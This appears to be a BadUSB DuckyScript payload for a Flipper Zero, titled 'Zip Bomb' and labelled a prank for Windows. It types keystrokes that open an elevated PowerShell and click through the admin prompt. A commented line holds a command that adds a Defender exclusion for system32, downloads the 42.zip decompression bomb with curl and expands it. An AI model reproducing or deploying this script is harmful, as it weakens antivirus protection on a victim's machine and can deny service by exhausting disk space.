Flipper/BadUSB/Bombs/Zip_Bomb/Win/quack.txt

20 lines
594 B
Plaintext
Raw Normal View History

2022-08-12 18:13:20 +00:00
REM Title: Zip Bomb
REM Author: FalsePhilosopher
REM Target: Win, tested on 10
REM Props: Hak5, friends and memes
REM Version: 1.0
REM Category: Prank
REM Launches zip bomb
REM
REM startup delay
DELAY 300
GUI r
DELAY 500
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 2000
2022-08-13 04:26:44 +00:00
REM STRING powershell -w h Add-MpPreference -ExclusionPath C:\Windows\system32 ;; curl https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/zip_bomb/42.zip -OutFile 42.zip ;; Expand-Archive -Path 42.zip -Force
2022-08-12 18:13:20 +00:00
ENTER